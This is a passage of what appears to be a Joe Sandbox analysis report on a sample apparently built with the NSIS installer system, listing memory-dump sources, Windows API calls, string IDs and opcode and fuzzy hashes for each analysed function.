                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                                                      • String ID: <RM>$ManufactureJazz$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                                                                      • API String ID: 247603264-3955903134
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                                                      • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                                                                                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                                                      • String ID: nsa
                                                                                                                                                                                                                                                                                                                                      • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: HideWindow
                                                                                                                                                                                                                                                                                                                                      • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
